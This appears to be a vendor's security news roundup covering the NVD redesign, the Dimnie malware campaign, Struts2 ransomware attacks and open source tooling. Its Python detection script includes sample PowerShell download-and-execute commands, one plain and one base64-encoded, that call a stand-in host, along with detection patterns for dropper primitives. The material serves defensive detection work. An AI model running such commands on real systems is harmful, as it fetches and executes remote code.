NVD's New Look, Struts Vuln Ransomware & Google Open Source Goodies

NIST has redesigned the National Vulnerability Database with a much-needed, modernized look and feel, including a scrolling list of the latest scored vulnerabilities and a visualization section that offers different ways to look at the data. First impression? Some kinks still need to be worked out (the site loads very slowly), but finding vulnerability and mitigation information in the NVD is going to be much easier than it was in the past.

Latest Scored Vulnerabilities in NVD

March 2017 closed out with 1,347 new NVD entries, roughly 20 percent above the 1,100 vulnerabilities typically reported in a month. In other open source security and cybersecurity news: attackers have targeted developers on GitHub with an information-stealing program called Dimnie; researchers have seen the attacks on the Apache Struts2 vulnerability shift to delivering ransomware; Google has put much of its open source in one easy-to-find place; Jenkins plugins can help you safeguard the software you develop from the start; five ways to keep open source-based apps secure; pain and confusion with open source licenses; and the top four software development methodologies.

Open Source Developers Targeted in Sophisticated Malware Attack

For the past few months, developers who publish their code on GitHub have been targeted in an attack campaign that uses a little-known but potent cyberespionage malware, reports PCWorld. Emails crafted to attract the attention of developers carried .gz attachments containing Word documents with embedded malicious macros. If the recipient enabled macros, the macro ran a PowerShell script that contacted a remote server and downloaded the malware, known as Dimnie. The chain is worth noting for defenders: a Word process launching PowerShell, which then fetches content from the network, is something endpoint telemetry can catch regardless of which malware family is at the end of it.
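The following is an added example, not code from the original post or from PCWorld's report, showing how the Office-macro-to-PowerShell-to-download chain described above can be flagged from process-creation telemetry. It assumes events shaped like Sysmon Event ID 1 records with `ParentImage`, `Image` and `CommandLine` fields; every event in `SAMPLE_EVENTS`, including the 203.0.113.7 address, is constructed for illustration. It also handles the case a plain string match misses: a payload hidden behind `-EncodedCommand`, which PowerShell reads as base64 over UTF-16LE.

```python
"""Flag the Office-macro -> PowerShell -> remote download chain.

Added example, not code from the original post or from PCWorld's report.
Runs over constructed process-creation events shaped like Sysmon Event
ID 1 records (ParentImage, Image, CommandLine). Every event in
SAMPLE_EVENTS is made up for illustration, including the URL.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Primitives a dropper uses to fetch and run a second stage.
DOWNLOAD_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"Net\.WebClient", r"DownloadString", r"DownloadFile",
    r"Invoke-WebRequest", r"\biwr\b", r"Start-BitsTransfer",
    r"Invoke-Expression", r"\biex\b",
)]
# Flags that hide the window or skip policy, common in macro droppers.
EVASION_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"-w(?:indowstyle)?\s+hidden", r"-nop(?:rofile)?\b",
    r"-e(?:p|xecutionpolicy)\s+bypass",
)]
# -EncodedCommand may be abbreviated (-e, -ec, -enc, ...); capture any -e* flag
# and let decode_encoded_command() decide whether it really is that switch.
ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or '' if absent or invalid.
    PowerShell expects base64 over UTF-16LE, so decode it that way."""
    for flag, payload in ENC_FLAG.findall(cmdline):
        flag = flag.lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Classify one process-creation event.

    Returns (severity, reasons): 'high' when an Office app spawns an
    interpreter that fetches or evaluates remote content, 'medium' for the
    spawn alone, and None for everything else."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or image not in INTERPRETERS:
        return None, []
    reasons = [f"{parent} spawned {image}"]
    text = event.get("CommandLine", "")
    decoded = decode_encoded_command(text)
    if decoded:
        reasons.append("decoded -EncodedCommand payload")
        text += "\n" + decoded          # scan the plaintext as well
    hits = [p.pattern for p in DOWNLOAD_PATTERNS if p.search(text)]
    reasons += [f"download/execute primitive: {h}" for h in hits]
    reasons += [f"evasion flag: {p.pattern}" for p in EVASION_PATTERNS if p.search(text)]
    return ("high" if hits else "medium"), reasons


def triage(events):
    """Return [(severity, reasons, event)] for the events worth an alert."""
    out = []
    for ev in events:
        sev, reasons = analyze_event(ev)
        if sev:
            out.append((sev, reasons, ev))
    return out


# Constructed sample telemetry (not real events); the address is a documentation IP.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/u.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
_WORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": _WORD, "Image": _PS,
     "CommandLine": 'powershell.exe -w hidden -nop -c "' + _STAGE2 + '"'},
    {"ParentImage": _WORD, "Image": _PS,          # same payload, base64-hidden
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENCODED},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,   # admin, not the chain
     "CommandLine": 'powershell.exe -c "' + _STAGE2 + '"'},
    {"ParentImage": _WORD, "Image": _PS,          # Office spawned PowerShell, benign-looking
     "CommandLine": "powershell.exe -c Get-Date"},
]

if __name__ == "__main__":
    for sev, reasons, ev in triage(SAMPLE_EVENTS):
        print(sev.upper(), "|", "; ".join(reasons))
```

The parent/child pairing is the anchor of the rule, not the command line: the third sample uses the very same download cmdlet from explorer.exe and is ignored, because administrators do that legitimately, while an Office application spawning an interpreter is rare enough to review even when the command line looks harmless (the fourth sample, rated medium). Decoding `-EncodedCommand` before matching is what keeps the second sample from slipping past a rule that only looks at the raw string.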

Cerber for Servers: Apache Struts2 Campaign Targets Servers with Ransomware

via SC Magazine UK: F5 Networks researchers watched a campaign exploiting the Apache Struts2 vulnerability pivot on 20 March to delivering Cerber ransomware to the servers it compromised. Cerber encrypts the victim's files and demands bitcoin for the key to decrypt them. It is apparently popular on Russian underground forums, and Malwarebytes has called it "pretty powerful ransomware written with attention to detail," noting its "rich customization options and various tricks to make analysis harder." The point for defenders is that this campaign enters through an unpatched web application rather than a phishing email, so user awareness training does nothing here; keeping Struts current does.

Google Presents its Open Source Goodies to the World

via ZDNet: In a blog post, Will Norris, a software engineer at Google's Open Source Programs Office, wrote: "Free and open-source software has been part of our technical and organizational foundation since Google's early beginnings. From servers running the Linux kernel to an internal culture of being able to patch any other team's code, open source is part of everything we do. In return, we've released millions of lines of open-source code, run programs like Google Summer of Code and Google Code-in, and sponsor open-source projects and communities through organizations like Software Freedom Conservancy, the Apache Software Foundation, and many others."

And now, 18 years after Google was founded, Google has launched opensource.google.com. This site "ties together all of our initiatives with information on how we use, release, and support open source."

Jenkins Users Can Shore Up Software Security with Plugins

In an in-depth InfoWorld article, Fahmida Rashid looks at how you can safeguard the software you develop from the start with Jenkins plugins and integrations that automate security testing in the build. For example, the Black Duck Hub plugin for Jenkins identifies known vulnerabilities in open source components, enforces open source security policies, flags license issues, and detects modified open source components.

5 Ways to Keep Open Source Based Apps Secure

Open source is used in numerous applications in all industries by organizations of all sizes. The reasons are straightforward: Using open source lowers development costs, speeds time to market, and accelerates innovation. More than 80 percent of all cyberattacks specifically target applications. The combination of these two facts—applications are the #1 target of cyberattacks and open source is the foundation of most of today’s application code—leads to the inevitable conclusion that open-source vulnerabilities are one of the biggest risks to application security.

In TechBeacon, Black Duck Vice President of Security Strategy Mike Pittenger shares tips and best practices you can adopt now to manage open source risk.

Pain and Confusion with Open Source Licenses

Phil Odence, Black Duck vice president and general manager, shares his thoughts on Kyle Mitchell’s blog, Open Source License Business Perception Report.

“[Kyle] rates a list of popular licenses along two dimensions: Pain - how inconvenient they are to use; and Confusion - uncertainty in the meaning of their terms. He also includes some concise ‘Key Points’ about each. And, conveniently, he provided a link to the text of each license in the SPDX License List. (Kyle is an active contributor to the SPDX Legal Team.) The framework provides an interesting way to think about licenses and as input to developing an open source use policy or selecting a license for a project.”

Top 4 Software Development Methodologies

To manage a project efficiently, the manager or dev team must choose the software development method that works best for the project at hand. The many methodologies that exist were each created for different reasons. Black Duck intern Tyler Hubbell has done some research into why they exist and which ones are most commonly used.
